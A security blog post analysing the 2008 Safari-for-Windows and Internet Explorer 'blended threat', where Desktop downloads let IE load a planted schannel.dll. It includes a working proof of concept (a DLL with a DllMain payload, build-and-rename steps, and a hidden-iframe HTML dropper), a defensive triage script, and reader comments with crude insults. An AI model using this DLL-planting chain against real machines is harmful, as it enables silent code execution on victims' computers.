Design Flaw in Windows Internet Explorer Allows Remote Code Execution From Safari for Windows

Summary of What Happened
Nitesh Dhanjani discovered that Safari for Windows saves downloads to the Desktop automatically, without asking, and argued that this can make a mess of the Desktop; he named the effect the "Safari Carpet Bomb". Microsoft later issued an advisory stating that the issue allows "remote code execution on all supported versions of Windows XP and Windows Vista" and crediting "Aviv Raff for working with us and reporting the blended threat of Safari and Microsoft Internet Explorer". Aviv Raff posted "Safari pwns Internet Explorer" on his blog, clarifying that "this combined attack also exploits an old vulnerability in Internet Explorer that I've already reported to them a long long time ago".

Technical Details of This Incident

The old vulnerability Aviv Raff reported to Microsoft is described in two of his articles, "IE7 DLL-load hijacking Code Execution Exploit PoC" and "Internet Explorer 7 - Still Spyware Writers Heaven", both from 2006 (which really is "a long long time ago"). The vulnerability is that Windows Internet Explorer loads certain program library files (DLLs) from the user's Desktop instead of from its own library folder (usually C:\WINDOWS\SYSTEM32) when a file on the Desktop carries one of a few specific names.

Safari for Windows saves downloads to the Desktop by default, without confirmation - on its own a reasonable and convenient feature. Windows Internet Explorer loads a DLL from the Desktop if the file has one of those specific names. Put the two together, or "blend" them, and IE loads a library file that Safari downloaded. Loading a library runs the code in that library, so loading the wrong file means executing the wrong code - here, code chosen by whoever served the download. The victim only has to visit a page in Safari and later start Internet Explorer; neither step shows a prompt.
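To make the search order concrete, here is an added example (not code from this post, from Microsoft or from Apple) that models the documented Windows DLL search order in Python for a library requested by bare name, with SafeDllSearchMode on and off. The directory snapshot is constructed: it places the genuine schannel.dll in system32, a planted schannel.dll on the Desktop, and a second watched name, sqmapi.dll, that this imaginary machine does not ship in any system directory, and it assumes the Desktop is the current working directory of the loading process. The Internet Explorer install directory and the PATH entries are illustrative assumptions.

```python
"""Model of the Windows DLL search order for a library requested by bare
name, used to show where "schannel.dll" resolves when a copy has been
dropped on the Desktop. Added example, not code from this post; the
directory snapshot below is constructed and the install/PATH locations
are illustrative assumptions."""

from __future__ import annotations

# Assumed locations (illustrative, not read from a real machine)
APP_DIR = r"C:\Program Files\Internet Explorer"   # directory of the loading executable
SYSTEM32 = r"C:\WINDOWS\system32"
SYSTEM16 = r"C:\WINDOWS\system"                    # 16-bit system directory
WINDIR = r"C:\WINDOWS"
DESKTOP = r"C:\Documents and Settings\user\Desktop"
PATH_DIRS = [r"C:\WINDOWS\system32", r"C:\WINDOWS"]


def search_order(cwd: str, safe_dll_search_mode: bool) -> list[str]:
    """Directories in the order the loader consults them for a bare DLL name.

    SafeDllSearchMode (enabled by default from Windows XP SP2 on) moves the
    current working directory from second place to after the system and
    Windows directories."""
    if safe_dll_search_mode:
        order = [APP_DIR, SYSTEM32, SYSTEM16, WINDIR, cwd]
    else:
        order = [APP_DIR, cwd, SYSTEM32, SYSTEM16, WINDIR]
    return order + PATH_DIRS


def resolve(name: str, cwd: str, safe_dll_search_mode: bool,
            filesystem: dict[str, set[str]]) -> str | None:
    """First directory in the search order that holds `name`, or None."""
    wanted = name.lower()
    for directory in search_order(cwd, safe_dll_search_mode):
        if wanted in {f.lower() for f in filesystem.get(directory, set())}:
            return directory
    return None


# Constructed snapshot: the real schannel.dll lives in system32, Safari has
# dropped a second schannel.dll and an sqmapi.dll on the Desktop, and this
# imaginary machine ships no sqmapi.dll in any system directory.
FS = {
    SYSTEM32: {"schannel.dll", "kernel32.dll"},
    DESKTOP: {"schannel.dll", "sqmapi.dll"},
    APP_DIR: {"iexplore.exe"},
}


def where_does_ie_load(name: str, safe_dll_search_mode: bool) -> str | None:
    """Where the browser picks up `name` with the Desktop as its CWD."""
    return resolve(name, DESKTOP, safe_dll_search_mode, FS)


def hijacked_from_desktop(name: str, safe_dll_search_mode: bool) -> bool:
    return where_does_ie_load(name, safe_dll_search_mode) == DESKTOP


if __name__ == "__main__":
    for safe in (True, False):
        for dll in ("schannel.dll", "sqmapi.dll"):
            mode = "on" if safe else "off"
            print(f"SafeDllSearchMode {mode}: {dll} -> {where_does_ie_load(dll, safe)}")
```

Under the safe order a Desktop copy of a name that also exists in system32 never wins, which matches the Vista report in the comments below where OllyDbg showed system32's schannel.dll being the loaded module; a name absent from every system directory falls through to the current directory in both modes. The model does not explain why IE7 picked up schannel.dll on the machines where the PoC fired; it only shows which positions in the search a planted file can occupy, and that changing SafeDllSearchMode alone does not close the hole for names the system does not ship.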

Proof of Concept Code
----------dll.c----------
#include <windows.h>
#include <tchar.h>

/* Proof-of-concept payload: once this DLL is loaded into a process, it
 * launches NOTEPAD with a bogus file name so the load is visible. */
BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    /* CreateProcess may modify its command-line buffer, so it must be writable */
    TCHAR cmd[] = _T("NOTEPAD \"=====(((((we are in)))))=====\"");

    /* the loader also calls DllMain for thread attach/detach and process
     * detach; only fire once, on process attach */
    if (fdwReason != DLL_PROCESS_ATTACH)
        return TRUE;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    if (CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
    return TRUE;
}



Compile with cl /LD dll.c and rename the generated DLL file to "schannel.dll", the name Internet Explorer will pick up from the Desktop.

----------index.html----------

<html><head>
<title>Safari for Windows Proof of Concept (Incident in June 2008)</title>
</head><body>
Safari for Windows Proof of Concept (Incident in June 2008)<br>
<br>
<a href="http://liudieyu0.blog124.fc2.com/blog-entry-1.html">Detailed Analysis Available on My Blog ...</a><br>
<br>
Step 1. Browse this web page with Safari for Windows; the download is saved to the Desktop without a prompt.
It's a legitimate feature.<br>
<!-- the hidden iframe requests the DLL; Safari saves it to the Desktop as schannel.dll -->
<iframe src="schannel.dll" width=1 height=1></iframe><br>
Step 2. Now launch Internet Explorer from the Desktop or Start Menu, and the code in the DLL file is executed.
<i>This is the issue.</i><br>
<br>
Note:<br>
The code in the DLL launches NOTEPAD to open a file that doesn't exist.<br>
Please remove the downloaded DLL file from the Desktop after testing.<br>
</body></html>

Live Demo
http://liudieyu.com/iesafari200806.2885391780966027/
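For the defender's side, here is an added example (not from this post or the PoC above) in Python that triages a download folder for the blended attack: it flags files carrying one of the DLL names cited on this page as loadable from the Desktop (schannel.dll, sqmapi.dll, imageres.dll) and checks, from the DOS and PE headers, whether the file is really a PE image built as a DLL rather than an unrelated download that merely has a .dll name. The folder contents are constructed in memory so it runs offline; on a real machine you would feed it the bytes of each file in the Safari download directory.

```python
"""Triage of a download folder for the blended attack above: flag any
file whose name matches a DLL that a program may load by bare name, and
confirm from the DOS/PE headers that it is really a PE image built as a
DLL rather than an unrelated download that merely carries a .dll name.
Added example, not code from this post; the folder contents are
constructed in memory."""

from __future__ import annotations

import struct

# DLL names cited on this page as loadable from the Desktop.
WATCHED_NAMES = {"schannel.dll", "sqmapi.dll", "imageres.dll"}

IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002  # COFF Characteristics flags
IMAGE_FILE_DLL = 0x2000


def pe_is_dll(data: bytes) -> bool:
    """True only for a well-formed DOS header -> PE signature -> COFF header
    whose Characteristics carry IMAGE_FILE_DLL. Truncated or non-PE input
    is reported as not-a-DLL rather than raising."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)      # offset of "PE\0\0"
    if e_lfanew + 24 > len(data):                            # signature (4) + COFF header (20)
        return False
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False
    (characteristics,) = struct.unpack_from("<H", data, e_lfanew + 22)
    return bool(characteristics & IMAGE_FILE_DLL)


def triage(folder: dict[str, bytes]) -> list[tuple[str, str]]:
    """(filename, verdict) for every watched name present in `folder`."""
    findings = []
    for name, data in folder.items():
        if name.lower() not in WATCHED_NAMES:
            continue
        verdict = "PE DLL planted" if pe_is_dll(data) else "watched name but not a PE DLL"
        findings.append((name, verdict))
    return sorted(findings)


def make_pe(characteristics: int, e_lfanew: int = 0x80) -> bytes:
    """Smallest header sequence pe_is_dll() accepts; used only to build test data."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine=I386, 1 section, no timestamp/symbols, no optional header, flags
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b"\0" * (e_lfanew - 0x40) + b"PE\0\0" + coff


# Constructed Desktop listing: a DLL-flagged image under a watched name, an
# EXE-flagged image under a watched name, an HTML page saved as .dll, and an
# unrelated download.
DESKTOP = {
    "schannel.dll": make_pe(IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_DLL),
    "sqmapi.dll": make_pe(IMAGE_FILE_EXECUTABLE_IMAGE),
    "imageres.dll": b"<html>not a binary</html>",
    "holiday.jpg": b"\xff\xd8\xff",
}


def triage_desktop() -> dict[str, str]:
    return dict(triage(DESKTOP))


if __name__ == "__main__":
    for name, verdict in triage(DESKTOP):
        print(f"{name}: {verdict}")
```

A file with a watched name that is not a DLL still deserves a look, since a later download could replace it, but only a genuine DLL-flagged image is something a LoadLibrary call will map and run; the check therefore separates "carpet bomb clutter" from an actual planted payload.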

Final Words on This
A design flaw in Windows Internet Explorer, version 8 beta, 7 and probably others, breaks the security of Apple's Safari for Windows. The problem originates in Windows Internet Explorer loading some program library files (DLLs) from the user's Desktop instead of from its own library folder (usually C:\WINDOWS\SYSTEM32). Apple's Safari for Windows saves requested files to the user's Desktop by default; that default, by itself, is not a mistake. Microsoft's advisory uses vague wording: its "Suggested Actions" are to "Restrict use of Safari as a web browser ...", as if the flaw were rooted in Safari.

Under "Suggested Actions", Microsoft does list as a "Workaround": "Change the download location of content in Safari to a newly created directory". The full statement should read "Change the download location of content in Safari to a newly created directory (to preserve the integrity of Windows Internet Explorer)".

PS:
I'm not an Apple fan; in fact I applied for their Safari for Windows Tester position and they never replied. That's not so lame, since they don't even get back to reporters when the whole world is accusing their product: "An Apple spokesman did not return a phone call and e-mail seeking comment".

I believe in time all things come to light.

trackback


Technical Details of Security Issues Regarding Safari for Windows

LIUDIEYU wrote in Bugtraq: A New Security Issue in Safari for Windows, NOT the "Blended Threat"

comment

Please read the advisory again

If you had read through the MS advisory, you might have saved yourself some work.

It says under FAQs "A combination of the default download location in Safari and how the Windows desktop handles executables creates a blended threat in which files may be downloaded to a user’s machine without prompting, allowing them to be executed."

And in the summary (above all the folders) it also says -

"Mitigating Factors: Customers who have changed the default location where Safari downloads content to the local drive are not affected by this blended threat."

And they also restate this in the Workarounds section (as you pointed out).

It is a "blended" threat so by definition Safari is only part of the problem. From what I gather Safari downloads files WITHOUT prompting, which is not a secure default setting.

"A design flaw in Windows Internet Explorer, version 8 beta, 7, and probably others"

Hello Liu,

It's not a design fault in Internet Explorer: it is a design fault in the core Windows OS. LoadLibrary searches the current working directory by default, and in some configurations places it ahead of %SysDir% in the search order. It is this fundamental insecurity in the DLL search path that is the root cause of the risk.

When launching any application from Windows Explorer, the current working directory is always the Desktop, and that's why the bogus schannel DLL gets loaded; on the other hand, you could have called it kernel32.dll and then it would get launched as soon as you start /any/ application from the Explorer shell.

Have you tried this in conjunction with SafeDllSearchMode?

you must credit aviv raff

Even MS credited him.
He gave a screenshot:
http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx
which easily links to
http://milw0rm.org/exploits/2929
clearly saying:

Compile and upload to the victim's desktop as one of the following hidden DLL files:
- sqmapi.dll
- imageres.dll
- schannel.dll

Run IE7 and watch the nice calculators pop up.

about time

you came back to life

FF is better, because..

FF is better, because by default it asks before downloading this DLL.

MS

Microsoft sucks so hard.

There is nothing wrong with Safari. The user's Desktop is a place where any file could be stored, and this cannot affect the OS's security.

IE is such crap. I pity the idiots who still use it.

i agree with michael evanchik

About time you came back to life, Liu Die Yu.

No title

Awesome, man! The code works and it's great! Can't believe that using Safari and IE together could open up my PC to the world.

can not reproduce

Can't reproduce the issue with IE7 on Vista.

The DLL from the PoC demo site is on the Desktop, but no Notepad appears upon opening iexplore.
When debugging iexplore with OllyDbg, the DLL on the Desktop is not in the executable modules list; instead this one is used:

Executable modules, item 66
Base=75840000
Size=00045000 (282624.)
Entry=758416D9 schannel.<ModuleEntryPoint>
Name=schannel (system)
File version=6.0.6000.16508 (vista_gdr.07061
Path=C:\Windows\system32\schannel.dll

No title

This is not an Internet Explorer or Safari issue.

It is a general Windows issue. Every program on Windows looks for DLLs first in the current working directory.

insecure by design

munk is talking out of his arse

This is not a windows issue. Any browser downloading files (and I don't mean into the cache of the browser) without consent is inherently insecure, no matter what the Mac fanboys say.

No title

It is a general Windows issue.

Thanks

Hi, thanks for your great post. Very nice and useful.

No title

Microsoft sucks so hard - it is fucking true. Thanks.

Author: Liu Die Yu